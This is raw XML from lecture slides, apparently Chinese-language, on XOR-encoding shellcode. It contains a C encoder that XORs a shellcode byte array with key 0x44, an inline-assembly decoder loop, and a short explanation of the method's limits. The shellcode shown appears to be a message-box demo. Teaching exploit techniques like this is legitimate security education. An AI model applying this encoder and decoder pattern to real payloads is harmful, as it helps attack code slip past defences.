                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>(input);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unsigned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output= (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>unsigned</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malloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>(len+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="098658"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>1</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for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i</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;i&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>len;i</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output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i</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input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i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>]^key; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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00"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>FILE *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>fp</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if</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0000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>fp</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795E26"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>fopen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encode.txt"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0" err="1">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A31515"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>"w</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795E26"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>exit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 </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fprintf</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fp</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1080"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>%s</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 output);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err="1">
                <a:solidFill>
                  <a:srgbClr val="795E26"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>fclose</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err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>fp</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a:p>
            <a:br>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
            </a:b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main</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FF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>int</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argc</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err="1">
                <a:solidFill>
                  <a:srgbClr val="001080"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>argv</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0000FF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>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\x33\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="EE0000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>xDB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EE0000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>\x53\x68\x72\x6C\x64\x20</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>"</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\x68\x6F\x20\x77\x6F\x68\x68\x65</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>"</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\x6C\x6C\x8B\xC4\x53\x50\x50\x53</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:endParaRPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>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EE0000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>\xB8\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="EE0000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>xEA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EE0000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>\x07\x45\x7E\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="EE0000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>xFF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EE0000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>\xD0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>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795E26"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="795E26"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>encoder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>(shellcode,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="098658"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>0x44</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zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AF00DB"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AF00DB"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="098658"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600"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79202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4673985" cy="5256212"/>
            <a:chOff x="623888" y="1052513"/>
            <a:chExt cx="4673985" cy="5256212"/>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467398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651000"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异或编码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651000" y="1690708"/>
              <a:ext cx="4536504" cy="1791965"/>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异或编码是一种简单易用的</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编码方法，它的编解码程序非常简单。但是，它也存在很多限制，比如在选取编码字节时，不可与已有字节相同，否则会出现</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3" name="矩形 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{256161F4-766C-C824-AC32-447B970A69C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5663952" y="1058913"/>
            <a:ext cx="5761286"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5663952"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解码程序</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="文本框 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A3CBDEB-575B-00AE-A610-AD66DE4EF034}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5663952" y="1700647"/>
            <a:ext cx="5878512" cy="4524315"/>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_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>asm</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call </a:t>
            </a:r>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pop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add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0x15</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err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>decode_loop</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bl,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0x44</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bl</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inc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cmp</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0x90</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jne</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decode_loop</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02547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4673985" cy="5256212"/>
            <a:chOff x="623888" y="1052513"/>
            <a:chExt cx="4673985" cy="5256212"/>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467398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651000"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异或编码</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="文本框 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{834F9780-0674-44A0-FF7F-C80FD400A950}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="651000" y="1690708"/>
              <a:ext cx="4536504" cy="4215706"/>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异或编码是一种简单易用的</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编码方法，它的编解码程序非常简单。但是，它也存在很多限制，比如在选取编码字节时，不可与已有字节相同，否则会出现</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在解码程序中，默认</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开始时对准</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起始位置，之后的代码每次将</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的代码异或特定</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key</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0x44</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后重新覆盖原先</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的代码。末尾放一个空指令</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x90</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作为结束符。</a:t>
              </a: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13" name="矩形 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{256161F4-766C-C824-AC32-447B970A69C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5663952" y="1058913"/>
            <a:ext cx="5761286"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5663952"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解码程序</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="文本框 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A3CBDEB-575B-00AE-A610-AD66DE4EF034}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5663952" y="1700647"/>
            <a:ext cx="5878512" cy="4524315"/>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_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>asm</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call </a:t>
            </a:r>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pop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add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0x15</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err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>decode_loop</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bl,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0x44</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bl</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inc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cmp</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0x90</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jne</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decode_loop</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47327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01</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zh-CN" altLang="en-US" sz="6000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>概念及示例</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="6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702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 S</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="3200" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>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467398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合 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE24154A-88FA-9351-5A13-62C68CE37C22}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5663952" y="1058913"/>
            <a:ext cx="5761286" cy="5249811"/>
            <a:chOff x="-25648" y="1052513"/>
            <a:chExt cx="5761286" cy="5249811"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="矩形 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{256161F4-766C-C824-AC32-447B970A69C7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-25648" y="1052513"/>
              <a:ext cx="5761286"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25648" y="11418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解码程序</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="文本框 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A3CBDEB-575B-00AE-A610-AD66DE4EF034}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5663952" y="1700647"/>
            <a:ext cx="5878512" cy="4524315"/>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FF"/>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_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>asm</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call </a:t>
            </a:r>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a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>lable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>: pop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add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0x15</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err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>decode_loop</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bl,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xor</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0x44</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mov [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>eax</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err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>], bl</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inc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ecx</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cmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> bl, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="098658"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>0x90</a:t>
            </a:r>
            <a:endParaRPr lang="en"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jne</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0000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>decode_loop</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pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="图片 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{312C81CF-067D-DB8B-8353-79BC535830D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="760915" y="1329643"/>
            <a:ext cx="4677582" cy="4774778"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3838906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 S</a:t>
            </a:r>
            <a:r>
